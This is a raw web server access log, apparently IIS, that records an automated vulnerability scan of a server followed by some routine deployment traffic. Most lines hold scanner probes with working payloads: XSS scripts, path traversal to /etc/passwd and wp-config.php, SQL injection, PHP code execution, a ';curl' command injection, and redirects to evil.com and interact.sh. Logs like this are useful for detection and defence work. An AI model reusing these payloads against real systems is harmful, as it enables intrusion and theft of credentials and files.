2024-01-05 02:01:20 103.153.214.94 GET /session/language last_page=session%2Flogin&amp;language=en%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&amp;login&amp;CipheredValue 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 7
2024-01-05 02:01:23 103.153.214.94 GET /session/login - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 5
2024-01-05 02:02:29 103.153.214.94 POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 9
2024-01-05 02:02:32 103.153.214.94 GET /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/2aVH1GTaSxfw77x5rqfMKgHpMEC.jsp - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 404 7 0 8
2024-01-05 02:02:38 103.153.214.94 GET /html/repository - 8172 - 203.205.9.60 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 404 7 0 5
2024-01-05 02:05:16 103.153.214.94 GET /services/user/values.xml var=STATUS 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 404 7 0 9
2024-01-05 02:05:36 103.153.214.94 GET /html/device-id - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 404 7 0 7
2024-01-05 02:07:17 103.153.214.94 GET /blast/nph-viewgif.cgi ../../../../etc/passwd 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 11
2024-01-05 02:08:19 103.153.214.94 GET /fuel/pages/select/ filter=%27%2bpi(print(%24a%3d%27system%27))%2b%24a(%27cat%20/etc/passwd%27)%2b%27 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 404 7 0 9
2024-01-05 02:08:49 103.153.214.94 GET /plugins/captcha/crypt/cryptographp.php cfg=1%0D%0ASet-Cookie:%20crlfinjection=1 8172 - 203.205.9.60 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 404 7 0 9
2024-01-05 02:09:48 103.153.214.94 POST /web/google_analytics.php - 8172 - 203.205.9.60 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 404 7 0 8
2024-01-05 02:11:27 103.153.214.94 GET /api/console/api_server sense_version=%40%40SENSE_VERSION&amp;apis=../../../../../../../../../../../etc/passwd 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 11
2024-01-05 02:12:47 103.153.214.94 GET /plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php extension=menu&amp;view=menu&amp;parent=&quot;%20UNION%20SELECT%20NULL,NULL,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION(),md5(999999999)),NULL,NULL,NULL,NULL,NULL--%20aa 8172 - 203.205.9.60 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 https://bcvt.kontum.gov.vn:8172 404 7 0 17
2024-01-05 02:13:32 103.153.214.94 POST /wp-admin/admin.php - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 404 7 0 32
2024-01-05 02:13:41 103.153.214.94 GET /wicket/resource/nl.planon.pssm.dashboard.cre.engine.wicket.page.AbstractDashboardPage/html/nodata.html nodatamsg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 8172 - 203.205.9.60 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 404 7 0 9
2024-01-05 02:13:42 103.153.214.94 GET /admin/index.php module=file_editor&amp;file=/../../../../../../../../../../../etc/passwd 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 6
2024-01-05 02:13:53 103.153.214.94 GET /plus/feedback.php/rp4hu&#039;&gt;&lt;script&gt;alert(document.domain)&lt;/script&gt; aid=3 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 400 0 0 8
2024-01-05 02:14:00 103.153.214.94 GET /microstrategy7/Login.asp Server=Server001&amp;Project=Project001&amp;Port=0&amp;Uid=Uid001&amp;Msg=%22%3E%3Cscript%3Ealert(/2aVH1ICsXardmzeWXk1GryhDEwq/)%3B%3C%2Fscript%3E%3C 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 404 7 0 7
2024-01-05 02:14:29 103.153.214.94 GET /WebMstr7/servlet/mstrWeb evt=3045&amp;src=mstrWeb.3045&amp;subpage=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 9
2024-01-05 02:14:35 103.153.214.94 GET /select_project.php url=http://interact.sh 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 404 7 0 5
2024-01-05 02:14:38 103.153.214.94 GET /clock_status.php current_page=http://interact.sh 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 7
2024-01-05 02:17:45 103.153.214.94 GET /jasperserver-pro/reportresource/reportresource/ resource=net/sf/jasperreports/../../../../js.jdbc.properties 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 404 7 0 13
2024-01-05 02:19:35 103.153.214.94 GET /html/common/forward_js.jsp FORWARD_URL=http://evil.com 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 404 7 0 9
2024-01-05 02:19:38 103.153.214.94 GET /html/portlet/ext/common/page_preview_popup.jsp hostname=evil.com 8172 - 203.205.9.60 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 404 7 0 7
2024-01-05 02:20:20 103.153.214.94 GET /manage/webshell/u s=5&amp;w=218&amp;h=15&amp;k=%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a&amp;l=62&amp;_=5621298674064 8172 - 203.205.9.60 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 404 7 0 26
2024-01-05 02:20:24 103.153.214.94 GET /manage/webshell/u s=5&amp;w=218&amp;h=15&amp;k=%0a&amp;l=62&amp;_=5621298674064 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 404 7 0 10
2024-01-05 02:20:53 103.153.214.94 GET /api/v1/namespaces/kube-system/secrets/kubernetes-dashboard-certs - 8172 - 203.205.9.60 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 404 7 0 14
2024-01-05 02:20:56 103.153.214.94 GET /k8s/api/v1/namespaces/kube-system/secrets/kubernetes-dashboard-certs - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 404 7 0 16
2024-01-05 02:24:29 103.153.214.94 GET / - 8172 - 203.205.9.60 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 404 7 0 8
2024-01-05 02:24:33 103.153.214.94 GET /etc/passwd - 8172 - 203.205.9.60 - - 404 7 0 8
2024-01-05 02:24:37 103.153.214.94 GET /enginemanager/server/logs/download logType=error&amp;logName=../../../../../../../../etc/passwd&amp;logSource=engine 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 13
2024-01-05 02:24:45 103.153.214.94 GET /iwc/idcStateError.iwc page=javascript%3aalert(document.domain)%2f%2f 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 404 7 0 27
2024-01-05 02:25:30 103.153.214.94 GET /sgdadmin/faces/com_sun_web_ui/help/helpwindow.jsp windowTitle=AdministratorHelpWindow&gt;&lt;/TITLE&gt;&lt;/HEAD&gt;&lt;body&gt;&lt;script&gt;alert(1337)&lt;/script&gt;&lt;!--&amp;&gt;helpFile=concepts.html 8172 - 203.205.9.60 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 404 7 0 10
2024-01-05 02:26:13 103.153.214.94 GET /index.php q=file:///etc/passwd 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 6
2024-01-05 02:28:21 103.153.214.94 GET / - 8172 - 203.205.9.60 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 404 7 0 9
2024-01-05 02:28:26 103.153.214.94 GET / - 8172 - 203.205.9.60 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 404 7 0 7
2024-01-05 02:30:09 103.153.214.94 GET /src/login.php referer=%22%3E%3Cscript%3Econfirm(document.domain)%3C/script%3E 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 404 7 0 18
2024-01-05 02:30:21 103.153.214.94 GET /tarantella/cgi-bin/secure/ttawlogin.cgi/ action=start&amp;pg=../../../../../../../../../../../../../../../etc/passwd 8172 - 203.205.9.60 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 7
2024-01-05 02:34:45 103.153.214.94 GET /wp-content/plugins/jsmol2wp/php/jsmol.php isform=true&amp;call=saveFile&amp;data=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&amp;mimetype=text/html;%20charset=utf-8 8172 - 203.205.9.60 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 404 7 0 12
2024-01-05 02:35:12 103.153.214.94 GET /wp-content/plugins/jsmol2wp/php/jsmol.php isform=true&amp;call=getRawDataFromDatabase&amp;query=php://filter/resource=../../../../wp-config.php 8172 - 203.205.9.60 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 404 7 0 6
2024-01-05 02:39:01 103.153.214.94 GET /_s_/dyn/Log_highlight href=../../../../windows/win.ini&amp;n=1 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 11
2024-01-05 02:39:47 103.153.214.94 GET /imcat/root/tools/adbug/binfo.php phpinfo1 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 9
2024-01-05 02:40:04 103.153.214.94 GET /plugins/servlet/Wallboard/ dashboardId=10000&amp;dashboardId=10000&amp;cyclePeriod=alert(document.domain) 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 6
2024-01-05 02:40:59 103.153.214.94 POST /wp-content/plugins/wp-payeezy-pay/donate.php - 8172 - 203.205.9.60 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 404 7 0 7
2024-01-05 02:41:25 103.153.214.94 POST /XMLCHART - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 7
2024-01-05 02:41:48 103.153.214.94 POST /OA_HTML/lcmServiceController.jsp - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 10
2024-01-05 02:42:56 103.153.214.94 GET /pages/includes/status-list-mo&lt;iframe+src=&quot;javascript:alert(document.domain)&quot;&gt;.vm - 8172 - 203.205.9.60 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 400 0 0 13
2024-01-05 02:44:21 103.153.214.94 GET /admin/tools/a--&lt;/script&gt;&lt;script&gt;alert(document.domain)&lt;/script&gt; - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 400 0 0 12
2024-01-05 02:44:48 103.153.214.94 GET /wp-content/plugins/sagepay-server-gateway-for-woocommerce/includes/pages/redirect.php page=&lt;/script&gt;&quot;&gt;&lt;script&gt;alert(document.domain)&lt;/script&gt; 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 9
2024-01-05 02:45:34 103.153.214.94 GET /index.php action=Login&amp;module=Users&amp;print=a&amp;%22%2F%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 404 7 0 8
2024-01-05 02:46:01 103.153.214.94 GET /index.php option=com_jtagmembersdirectory&amp;task=attachment&amp;download_file=../../../../../../../../../../../etc/passwd 8172 - 203.205.9.60 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 6
2024-01-05 02:46:20 103.153.214.94 POST /php/upload.php - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/104.0.5112.81+Safari/537.36 https://bcvt.kontum.gov.vn:8172 404 7 0 9
2024-01-05 02:46:23 103.153.214.94 GET /Uploads/2aVH18vrumRlP3ZfBMfZtFLjjrM.php7 - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 404 7 0 6
2024-01-05 02:46:28 103.153.214.94 POST /soap.cgi service=whatever-control;curl 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 7
2024-01-05 02:47:23 103.153.214.94 GET /assets/file:/etc/passwd - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 400 0 0 62
2024-01-05 02:49:10 103.153.214.94 POST /wp-admin/options-general.php page=smartcode 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 9
2024-01-05 02:49:13 103.153.214.94 GET / - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 4
2024-01-05 02:50:08 103.153.214.94 GET /include/downmix.inc.php - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 8
2024-01-05 02:50:20 103.153.214.94 GET /anchor/errors.log - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 404 7 0 12
2024-01-05 02:52:00 103.153.214.94 POST /login.php - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 9
2024-01-05 02:52:42 103.153.214.94 GET /redirector.php url=https://interact.sh 8172 - 203.205.9.60 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 404 7 0 14
2024-01-05 02:52:45 103.153.214.94 GET /redirector.php do=nodelay&amp;url=https://interact.sh 8172 - 203.205.9.60 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 404 7 0 23
2024-01-05 02:53:03 103.153.214.94 POST /ws_utc/resources/setting/options - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 404 7 0 8
2024-01-05 02:53:06 103.153.214.94 POST /ws_utc/resources/setting/keystore - 8172 - 203.205.9.60 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 404 7 0 5
2024-01-05 02:55:34 103.153.214.94 GET /cs/Satellite pagename=OpenMarket/Gator/FlexibleAssets/AssetMaker/complexassetmaker&amp;cs_imagedir=qqq&quot;&gt;&lt;script&gt;alert(document.domain)&lt;/script&gt; 8172 - 203.205.9.60 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 404 7 0 9
2024-01-05 02:55:38 103.153.214.94 GET /cs/Satellite pagename=OpenMarket%2FXcelerate%2FActions%2FSecurity%2FNoXceleditor&amp;WemUI=qqq%27;}%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 404 7 0 4
2024-01-05 02:55:41 103.153.214.94 GET /cs/Satellite pagename=OpenMarket%2FXcelerate%2FActions%2FSecurity%2FProcessLoginRequest&amp;WemUI=qqq%27;}%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 404 7 0 5
2024-01-05 02:56:01 103.153.214.94 POST /user/register element_parents=account/mail/%23value&amp;ajax_form=1&amp;_wrapper_format=drupal_ajax 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 bcvt.kontum.gov.vn:8172/user/register 404 7 0 8
2024-01-05 02:57:06 103.153.214.94 GET /index.php m=search&amp;c=index&amp;a=initxqb4n&lt;img%20src%3da%20onerror%3dalert(document.domain)&gt;cu9rs&amp;modelid=1&amp;q=tes 8172 - 203.205.9.60 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 404 7 0 10
2024-01-05 02:58:06 103.153.214.94 GET /tag_test_action.php url=a&amp;token&amp;partcode={dede:field%20name=%27source%27%20runphp=%27yes%27}echo%20md5%28%22CVE-2018-7700%22%29%3B{/dede:field} 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 404 7 0 14
2024-01-05 03:00:11 103.153.214.94 GET /admin/queues.jsp QueueFilter=yu1ey%22%3e%3cscript%3ealert(%221%22)%3c%2fscript%3eqb68 8172 - 203.205.9.60 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 404 7 0 22
2024-01-05 03:00:26 103.153.214.94 GET /wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php ajax_path=../../../../../../../wp-config.php 8172 - 203.205.9.60 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 404 7 0 10
2024-01-05 03:00:29 103.153.214.94 GET /wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php ajax_path=/etc/passwd 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 404 7 0 5
2024-01-05 03:00:32 103.153.214.94 POST /webtools/control/xmlrpc - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 404 7 0 5
2024-01-05 03:01:18 103.153.214.94 GET / - 8172 - 203.205.9.60 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 404 7 0 5
2024-01-05 03:01:39 103.153.214.94 GET /wp-content/uploads/wp-security-audit-log/failed-logins/ - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 10
2024-01-05 03:02:03 103.153.214.94 GET /.../.../.../.../.../.../.../.../.../windows/win.ini - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 0 0 37
2024-01-05 03:02:04 103.153.214.94 GET /tests/generate.php - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 7
2024-01-05 03:02:50 103.153.214.94 GET /modules/bamegamenu/ajax_phpcode.php code=print(md5(999999999)) 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 404 7 0 10
2024-01-05 03:03:39 103.153.214.94 GET /includes/mysql2i/mysql2i.func.php - 8172 - 203.205.9.60 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 404 7 0 8
2024-01-05 03:03:42 103.153.214.94 GET /addons/phpmailer/phpmailer.php - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 404 7 0 8
2024-01-05 03:04:54 103.153.214.94 HEAD /msdeploy.axd site=gdnn.gdtsolutions.vn 8172 - 116.96.77.140 - - 401 2 5 62
2024-01-05 03:04:54 103.153.214.94 HEAD /msdeploy.axd site=gdnn.gdtsolutions.vn 8172 gdnn 116.96.77.140 - - 200 0 0 54
2024-01-05 03:04:54 103.153.214.94 HEAD /msdeploy.axd site=gdnn.gdtsolutions.vn 8172 gdnn 116.96.77.140 - - 200 0 0 97
2024-01-05 03:04:54 103.153.214.94 POST /msdeploy.axd site=gdnn.gdtsolutions.vn 8172 gdnn 116.96.77.140 VS17.0:PublishDialog:WTE17.4.326.54890;sid=c9551c03-05f2-4e0c-900c-18a984e04ab7;op=Sync - 200 0 0 401
2024-01-05 03:04:54 103.153.214.94 POST /msdeploy.axd site=gdnn.gdtsolutions.vn 8172 gdnn 116.96.77.140 - - 200 0 0 590
2024-01-05 03:05:00 103.153.214.94 HEAD /msdeploy.axd site=gdnn.gdtsolutions.vn 8172 gdnn 116.96.77.140 - - 200 0 0 29
2024-01-05 03:05:00 103.153.214.94 HEAD /msdeploy.axd site=gdnn.gdtsolutions.vn 8172 gdnn 116.96.77.140 - - 200 0 0 27
2024-01-05 03:05:02 103.153.214.94 POST /msdeploy.axd site=gdnn.gdtsolutions.vn 8172 gdnn 116.96.77.140 - - 200 0 0 1163
2024-01-05 03:05:02 103.153.214.94 POST /msdeploy.axd site=gdnn.gdtsolutions.vn 8172 gdnn 116.96.77.140 VS17.0:PublishDialog:WTE17.4.326.54890;sid=a61da34a-511e-42be-bb71-d57411482873;op=Sync - 200 0 0 1056
2024-01-05 03:05:02 103.153.214.94 HEAD /msdeploy.axd site=gdnn.gdtsolutions.vn 8172 gdnn 116.96.77.140 - - 200 0 0 27
2024-01-05 03:05:03 103.153.214.94 POST /msdeploy.axd site=gdnn.gdtsolutions.vn 8172 gdnn 116.96.77.140 - - 200 0 0 1216
2024-01-05 03:05:03 103.153.214.94 POST /msdeploy.axd site=gdnn.gdtsolutions.vn 8172 gdnn 116.96.77.140 VS17.0:PublishDialog:WTE17.4.326.54890;sid=a61da34a-511e-42be-bb71-d57411482873;op=Sync - 200 0 0 1108
2024-01-05 03:05:35 103.153.214.94 GET /user/scripts/login_par.js - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 404 7 0 15
2024-01-05 03:05:46 103.153.214.94 GET /wp-content/plugins/wpsite-background-takeover/exports/download.php filename=../../../../wp-config.php 8172 - 203.205.9.60 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 404 7 0 8
